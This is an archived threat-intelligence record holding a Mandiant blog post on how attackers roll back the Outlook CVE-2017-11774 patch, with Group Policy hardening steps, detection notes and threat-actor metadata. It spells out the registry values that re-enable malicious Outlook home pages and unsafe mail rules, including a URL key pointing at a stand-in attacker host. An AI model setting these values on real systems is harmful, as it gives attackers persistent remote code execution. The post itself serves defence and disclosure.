{ "id": "d471354c-8c76-48ec-92e1-9888abe8b245", "created_at": "2026-04-06T03:36:37.248761Z", "updated_at": "2026-04-10T03:33:07.165511Z", "deleted_at": null, "sha1_hash": "948383d4e7bc89f5ae831c52453b50af40549f14", "title": "Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774) | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 602800, "plain_text": "Breaking the Rules: A Tough Outlook for Home Page Attacks\r\n(CVE-2017-11774) | Mandiant\r\nBy Mandiant\r\nPublished: 2019-12-04 · Archived: 2026-04-06 03:12:03 UTC\r\nWritten by: Matthew McWhirt, Nick Carr, Douglas Bienstock\r\nAttackers have a dirty little secret that is being used to conduct big intrusions. We’ll explain how they're\r\n\"unpatching\" an exploit and then provide new Outlook hardening guidance that is not available elsewhere.\r\nSpecifically, this blog post covers field-tested automated registry processing for registry keys to protect against\r\nattacker attempts to reverse Microsoft’s CVE-2017-11774 patch functionality.\r\nDespite multiple warnings from FireEye and U.S. Cyber Command, we have continued to observe an uptick in\r\nsuccessful exploitation of CVE-2017-11774, a client-side Outlook attack that involves modifying victims’ Outlook\r\nclient homepages for code execution and persistence. The Outlook Home Page feature allows for customization of\r\nthe default view for any folder in Outlook. This configuration can allow for a specific URL to be loaded and\r\ndisplayed whenever a folder is opened. This URL is retrieved either via HTTP or HTTPS - and can reference\r\neither an internal or external network location. When Outlook loads the remote URL, it will render the contents\r\nusing the Windows DLL ieframe.dll, which can allow an attacker to achieve remote code execution that persists\r\nthrough system restarts.\r\nWe have observed multiple threat actors adopting the technique and eventually becoming a favorite for Iranian\r\ngroups in support of both espionage and reportedly destructive attacks. FireEye first observed APT34 use CVE-2017-11774 in June 2018, followed by adoption by APT33 for a significantly broader campaign beginning in July\r\n2018 and continuing for at least a year. To further increase awareness of this intrusion vector, our Advanced\r\nPractices team worked with MITRE to update the ATT\u0026CK framework to include CVE-2017-11774 home page\r\npersistence within technique T1137 – “Office Application Startup”.\r\nFor more information on how CVE-2017-11774 exploitation works, how APT33 implemented it alongside\r\npassword spraying, and some common pitfalls for incident responders analyzing this home page technique, see the\r\n“RULER In-The-Wild” section of our December 2018 OVERRULED blog post.\r\nGoing Through a Rough Patch\r\nOn October 10, 2017, Microsoft released patches for Microsoft Outlook to protect against this technique.\r\nKB4011196 (Outlook 2010)\r\nKB4011178 (Outlook 2013)\r\nKB4011162 (Outlook 2016)\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 1 of 12\n\nFollowing the mid-2018 abuse by Iranian threat actors first detailed in our OVERRULED blog post, the FireEye\r\nMandiant team began to raise awareness of how the patch could be subverted. Doug Bienstock discussed in\r\nDecember 2018 that the simple roll back of the patch as a part of Mandiant’s Red Team operations – and alluded\r\nto observing authorized software that also automatically removes the patch functionality. In response to U.S.\r\nCyber Command’s mid-2019 warning about APT33’s use of the exploit, we raised concern with DarkReading\r\nover the ability to override the CVE-2017-11774 patch without escalated privileges.\r\nWithout continuous reinforcement of the recommended registry settings for CVE-2017-11774 hardening detailed\r\nwithin this blog post, an attacker can add or revert registry keys for settings that essentially disable the protections\r\nprovided by the patches.\r\nAn attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys.\r\nThe “URL” subkey will enable and set a home page for the specified mail folder within the default mailbox.\r\nSetting this registry key to a valid URL enables the home page regardless of the patch being applied or not.\r\nAlthough the option will not be accessible from the Outlook user interface (UI), it will still be set and render.\r\nImportantly, these keys are set within the logged-on user’s Registry hive. This means that no special privileges are\r\nrequired to edit the Registry and roll back the patch. The FireEye Red Team found that no other registry\r\nmodifications were required to set a malicious Outlook homepage.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\ Outlook\\WebView\\Inbox\r\n“URL”= http://badsite/homepage-persist.html\r\nThere are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe\r\noptions in Outlook. The following setting can be used to re-enable the original home page tab and roaming home\r\npage behavior in the Outlook UI.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n“EnableRoamingFolderHomepages”= dword:00000001\r\nThe following setting will allow for folders within secondary (non-default) mailboxes to leverage a custom home\r\npage.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n“NonDefaultStoreScript\"= dword:00000001\r\nThe following setting will allow for “Run as a Script” and “Start Application” rules to be re-enabled.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n“EnableUnsafeClientMailRules\"= dword:00000001\r\nWe agree that for the CVE-2017-11774 patch override vector to be successful, a bad guy has to persuade you to\r\nrun his program (law #1) and alter your operating system (law #2). However, the technique is under-reported, no\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 2 of 12\n\npublic mitigation guidance is available, and – as a fresh in-the-wild example demonstrates in this post – that initial\r\naccess and patch overriding can be completely automated.\r\nA Cavalier Handling of CVE-2017-11774\r\nThe Advanced Practices team monitors for novel implementations of attacker techniques including this patch\r\noverride, and on November 23, 2019 a uniquely automated phishing document was uploaded to VirusTotal. The\r\nsample, “TARA Pipeline.xlsm” (MD5: ddbc153e4e63f7b8b6f7aa10a8fad514), launches malicious Excel macros\r\ncombining several techniques, including:\r\nexecution guardrails to only launch on the victim domain (client redacted in screenshot)\r\ncustom pipe-delimited character substitution obfuscation\r\na creative implementation of CVE-2017-11774 using the lesser-known\r\nHKCU\\Software\\Microsoft\\Office\\\\Outlook\\WebView\\Calendar\\URL registry key\r\na URL pointing to the payload hosted in Azure storage blobs (*.web.core.windows.net) – a creative\r\ntechnique that allows an attacker-controlled, swappable payload to be hosted in a legitimate service\r\nand most importantly for this blog post – a function to walk through the registry and reverse the CVE-2017-11774 patch functionality for any version of Microsoft Outlook\r\nThese features of the malicious spear phishing Excel macro can be seen in Figure 1.\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 3 of 12\n\nFigure 1: Malicious macros automatically reverting the CVE-2017-11774 patch\r\nPay special attention to the forced setting of EnableRoamingFolderHomepages to “1” and the setup of\r\n“Calendar\\URL” key to point to an attacker-controlled payload, effectively disabling the CVE-2017-11774 patch\r\non initial infection.\r\nIn support of Managed Defense, our Advanced Practices team clusters and tactically attributes targeted threat\r\nactivity – whether the intrusion operators turn out to be authorized or unauthorized – in order to prioritize and\r\ndeconflict intrusions. In this case, Nick Carr attributed this sample to an uncategorized cluster of activity\r\nassociated with authorized red teaming, UNC1194 , but you might know them better as the TrustedSec red team\r\nwhose founder, Dave Kennedy, appeared on a previous episode of State of the Hack. This malicious Excel file\r\nappears to be a weaponized version of a legitimate victim-created document that we also obtained – reflecting a\r\ntechnique becoming more common with both authorized and unauthorized intrusion operators. For further\r\nanalysis and screenshots of UNC1194’s next stage CVE-2017-11774 payload for initial reconnaissance, target\r\nlogging visibility checks, and domain-fronted Azure command and control – see here. Readers should take note\r\nthat the automated patch removal and home page exploitation establishes attacker-controlled remote code\r\nexecution and allows these [thankfully authorized] attackers to conduct a full intrusion by swapping out their\r\npayload remotely for all follow-on activity.\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 4 of 12\n\nLocking Down the Registry Keys Using Group Policy Object (GPO) Enforcement\r\nAs established, the patches for CVE-2017-11774 can be effectively “disabled” by modifying registry keys on an\r\nendpoint with no special privileges. The following registry keys and values should be configured via Group Policy\r\nto reinforce the recommended configurations in the event that an attacker attempts to reverse the intended security\r\nconfiguration on an endpoint to allow for Outlook home page persistence for malicious purposes.\r\nTo protect against an attacker using Outlook’s WebView functionality to configure home page persistence, the\r\nfollowing registry key configuration should be enforced.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\WebView\r\n\"Disable\"= dword:00000001\r\nNote: Prior to enforcing this hardening method for all endpoints, the previous setting should be tested on a\r\nsampling of endpoints to ensure compatibility with third-party applications that may leverage webviews.\r\nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be\r\nconfigured.\r\nUser Configuration \u003e Preferences \u003e Windows Settings \u003e Registry\r\nNew \u003e Registry Item\r\nAction: Update\r\nHive: HKEY_CURRENT_USER\r\nKey Path: Software\\Microsoft\\Office\\\\Outlook\\Webview\r\nValue Name: Disable\r\nValue Type: REG_DWORD\r\nValue Data: 00000001\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 5 of 12\n\nFigure 2: Disabling WebView registry setting\r\nIncluded within the Microsoft Office Administrative Templates, a GPO setting is available which can be\r\nconfigured to disable a home page URL from being set in folder properties for all default folders, or for each\r\nfolder individually. If set to “Enabled”, the following GPO setting essentially enforces the same registry\r\nconfiguration (disabling WebView) as previously noted.\r\nUser Configuration \u003e Policies \u003e Administrative Templates \u003e Microsoft Outlook \u003e Folder Home Pages for Outlook Sp\r\nThe registry key configuration to disable setting an Outlook home page via the Outlook UI is as follows.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n\"EnableRoamingFolderHomepages\"= dword:00000000\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 6 of 12\n\nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be\r\nconfigured.\r\nUser Configuration \u003e Preferences \u003e Windows Settings \u003e Registry\r\nNew \u003e Registry Item\r\nAction: Update\r\nHive: HKEY_CURRENT_USER\r\nKey Path: Software\\Microsoft\\Office\\\\Outlook\\Security\r\nValue Name: EnableRoamingFolderHomepages\r\nValue Type: REG_DWORD\r\nValue Data: 00000000\r\nFigure 3: EnableRoamingFolderHomepages registry setting\r\nAdditionally, a home page in Outlook can be configured for folders in a non-default datastore. This functionality\r\nis disabled once the patch has been installed, but it can be re-enabled by an attacker. Just like this blog post’s\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 7 of 12\n\nillustration of several different home page URL registry keys abused in-the-wild – including the Outlook Today\r\nsetting from September 2018 and the Calendar URL setting from UNC1194’s November 2019 malicious macros –\r\nthese non-default mailstores provide additional CVE-2017-11774 attack surface.\r\nThe registry key configuration to enforce the recommended registry configuration is as follows.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\r\n\"NonDefaultStoreScript\"= dword:00000000\r\nTo enforce the expected hardened configuration of the registry key for non-default mailstores using a GPO, the\r\nfollowing setting can be configured.\r\nUser Configuration \u003e Preferences \u003e Windows Settings \u003e Registry\r\nNew \u003e Registry Item\r\nAction: Update\r\nHive: HKEY_CURRENT_USER\r\nKey Path: Software\\Microsoft\\Office\\\\Outlook\\Security\r\nValue Name: NonDefaultStoreScript\r\nValue Type: REG_DWORD\r\nValue Data: 00000000\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 8 of 12\n\nFigure 4: NonDefaultStoreScript registry setting\r\nIncluded within the previously referenced Microsoft Office Administrative Templates, a GPO setting is available\r\nwhich can be configured to not allow folders in non-default stores to be set as folder home pages.\r\nUser Configuration \u003e Policies \u003e Administrative Templates \u003e Microsoft Outlook \u003e Outlook Options \u003e Other \u003e Advanc\r\nThe registry key configuration to protect against an attacker re-enabling “Run as a Script” and “Start Application”\r\nrules is as follows.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Office\\\\Outlook\\Security\\\r\n\"EnableUnsafeClientMailRules\"= dword:00000000\r\nTo enforce the expected hardened configuration of the registry key using a GPO, the following setting can be\r\nconfigured.\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 9 of 12\n\nUser Configuration \u003e Preferences \u003e Windows Settings \u003e Registry\r\nNew \u003e Registry Item\r\nAction: Update\r\nHive: HKEY_CURRENT_USER\r\nKey Path: Software\\Microsoft\\Office\\\\Outlook\\Security\r\nValue Name: EnableUnsafeClientMailRules\r\nValue Type: REG_DWORD\r\nValue Data: 00000000\r\nFigure 5: EnableUnsafeClientMailRules registry setting\r\nOnce all of aforementioned endpoint policies are configured – we recommend a final step to protect these settings\r\nfrom unauthorized tampering. To ensure that the registry settings (configured via GPO) are continuously assessed\r\nand applied to an endpoint – even if the registry value was intentionally reversed by an attacker – the following\r\nGPO settings should also be configured and enforced:\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 10 of 12\n\nComputer Configuration \u003e Policies \u003e Administrative Templates \u003e System \u003e Group Policy \u003e Configure\r\nsecurity policy processing\r\nEnabled - Process even if the Group Policy objects have not changed\r\nComputer Configuration \u003e Policies \u003e Administrative Templates \u003e System \u003e Group Policy \u003e Configure\r\nregistry policy processing\r\nEnabled - Process even if the Group Policy objects have not changed\r\nFigure 6: Group Policy processing settings\r\nFor more environment hardening advice informed by front-line incident response, reach out to our Mandiant\r\nSecurity Transformation Services consulting team.\r\nLet’s Go Hunt (doo doo doo)\r\nWith this blog post, we’re providing an IOC for monitoring CVE-2017-11774 registry tampering – while written\r\nfor FireEye Endpoint Security (HX) in the OpenIOC 1.1 schema, this is a flexible behavioral detection standard\r\nthat supports real-time and historical events and the logic can be repurposed for other endpoint products.\r\nThe Yara hunting rule provided by Nick Carr at the end the OVERRULED blog post still captures payloads using\r\nCVE-2017-11774, including all of those used in intrusions referenced in this post, and can also be used to\r\nproactively identify home page exploits staged on adversary infrastructure. Further FireEye product detection\r\nagainst CVE-2017-11774 is also covered in the OVERRULED blog post.\r\nIf you’ve read the OVERRULED post (or are tired of hearing about it) but want some additional information, we\r\nrecommend:\r\n“You’ve Got Mail!” CDS 2018 technical track presentation including an APT34 CVE-2017-11774 home\r\npage sample\r\n“2 Factor 2 Furious” CDS 2018 technical track presentation on attackers bypassing multifactor – the best\r\nfirst line of defense against APT33’s password spraying and home page usage\r\n“#GuardrailsOfTheGalaxy” MITRE ATT\u0026CKcon 2019 lightning talk on execution guardrails – or see\r\nvarious examples shared on Twitter\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 11 of 12\n\nInteresting MITRE ATT\u0026CK techniques explicitly referenced in this blog post:\r\nID Technique Context\r\nT1137\r\nOffice Application\r\nStartup\r\nNick Carr contributed CVE-2017-11774 on behalf of FireEye for expansion\r\nof this technique\r\nT1480\r\nExecution\r\nGuardrails\r\nNick Carr contributed this new technique to MITRE ATT\u0026CK and it is used\r\nwithin the UNC1194 red team sample in this blog post\r\nAcknowledgements\r\nThe authors would like to acknowledge all of those at FireEye and the rest of the security industry who have\r\ncombatted targeted attackers leveraging creative techniques like home page persistence, but especially the analysts\r\nin Managed Defense SOC working around the clock to secure our customers and have disrupted this specific\r\nattack chain several times. We want to thank the SensePost team – for their continued creativity, responsible\r\ndisclosure of CVE-2017-11774, and their defensive-minded release of NotRuler – as well as the TrustedSec crew\r\nfor showing us some innovative implementations of these techniques and being great to coordinate with on this\r\nblog post. Lastly, thanks to Aristotle who has already offered what can only be interpreted as seasoned incident\r\nresponse and hardening advice for those who have seen RULER’s home page persistence in-the-wild: “He who is\r\nto be a good ruler must have first been ruled.”\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nhttps://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html" ], "report_names": [ "breaking-the-rules-tough-outlook-for-home-page-attacks.html" ], "threat_actors": [ { "id": "ce10c1bd-4467-45f9-af83-28fc88e35ca4", "created_at": "2022-10-25T15:50:23.458833Z", "updated_at": "2026-04-10T02:00:05.419537Z", "deleted_at": null, "main_name": "APT34", "aliases": null, "source_name": "MITRE:APT34", "tools": [ "netstat", "Systeminfo", "PsExec", "SEASHARPEE", "Tasklist", "Mimikatz", "POWRUNER", "certutil" ], "source_id": "MITRE", "reports": null }, { "id": "a63c994f-d7d6-4850-a881-730635798b90", "created_at": "2025-08-07T02:03:24.788883Z", "updated_at": "2026-04-10T02:00:03.785146Z", "deleted_at": null, "main_name": "COBALT TRINITY", "aliases": [ "APT33 ", "Elfin ", "HOLMIUM ", "MAGNALIUM ", "Peach Sandstorm ", "Refined Kitten ", "TA451 " ], "source_name": "Secureworks:COBALT TRINITY", "tools": [ "AutoCore", "Cadlotcorg", "Dello RAT", "FalseFont", "Imminent Monitor", "KDALogger", "Koadic", "NanoCore", "NetWire", "POWERTON", "PoshC2", "Poylog", "PupyRAT", "Schoolbag" ], "source_id": "Secureworks", "reports": null }, { "id": "cffb3c01-038f-4527-9cfd-57ad5a035c22", "created_at": "2022-10-25T15:50:23.38055Z", "updated_at": "2026-04-10T02:00:05.258283Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "COBALT GYPSY", "IRN2", "APT34", "Helix Kitten", "Evasive Serpens", "Hazel Sandstorm", "EUROPIUM", "ITG13", "Earth Simnavaz", "Crambus", "TA452" ], "source_name": "MITRE:OilRig", "tools": [ "ISMInjector", "ODAgent", "RDAT", "Systeminfo", "QUADAGENT", "OopsIE", "ngrok", "Tasklist", "certutil", "ZeroCleare", "POWRUNER", "netstat", "Solar", "ipconfig", "LaZagne", "BONDUPDATER", "SideTwist", "OilBooster", "SampleCheck5000", "PsExec", "SEASHARPEE", "Mimikatz", "PowerExchange", "OilCheck", "RGDoor", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "e5ff825b-0456-4013-b90a-971b93def74a", "created_at": "2022-10-25T15:50:23.824058Z", "updated_at": "2026-04-10T02:00:05.377261Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "APT33", "HOLMIUM", "Elfin", "Peach Sandstorm" ], "source_name": "MITRE:APT33", "tools": [ "PowerSploit", "AutoIt backdoor", "PoshC2", "Mimikatz", "NanoCore", "DEADWOOD", "StoneDrill", "POWERTON", "LaZagne", "TURNEDUP", "NETWIRE", "Pupy", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "67b2c161-5a04-4e3d-8ce7-cce457a4a17b", "created_at": "2025-08-07T02:03:24.722093Z", "updated_at": "2026-04-10T02:00:03.681914Z", "deleted_at": null, "main_name": "COBALT EDGEWATER", "aliases": [ "APT34 ", "Cold River ", "DNSpionage " ], "source_name": "Secureworks:COBALT EDGEWATER", "tools": [ "AgentDrable", "DNSpionage", "Karkoff", "MailDropper", "SideTwist", "TWOTONE" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-10T02:00:03.752071Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f", "created_at": "2023-01-06T13:46:38.367369Z", "updated_at": "2026-04-10T02:00:02.945356Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "Elfin", "MAGNALLIUM", "HOLMIUM", "COBALT TRINITY", "G0064", "ATK35", "Peach Sandstorm", "TA451", "APT 33", "Refined Kitten" ], "source_name": "MISPGALAXY:APT33", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-10T02:00:02.999196Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Crambus", "Helix Kitten", "APT34", "IRN2", "ATK40", "G0049", "EUROPIUM", "TA452", "Twisted Kitten", "Cobalt Gypsy", "APT 34", "Evasive Serpens", "Hazel Sandstorm", "Earth Simnavaz" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775446597, "ts_updated_at": 1775791987, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/948383d4e7bc89f5ae831c52453b50af40549f14.pdf", "text": "https://archive.orkl.eu/948383d4e7bc89f5ae831c52453b50af40549f14.txt", "img": "https://archive.orkl.eu/948383d4e7bc89f5ae831c52453b50af40549f14.jpg" } }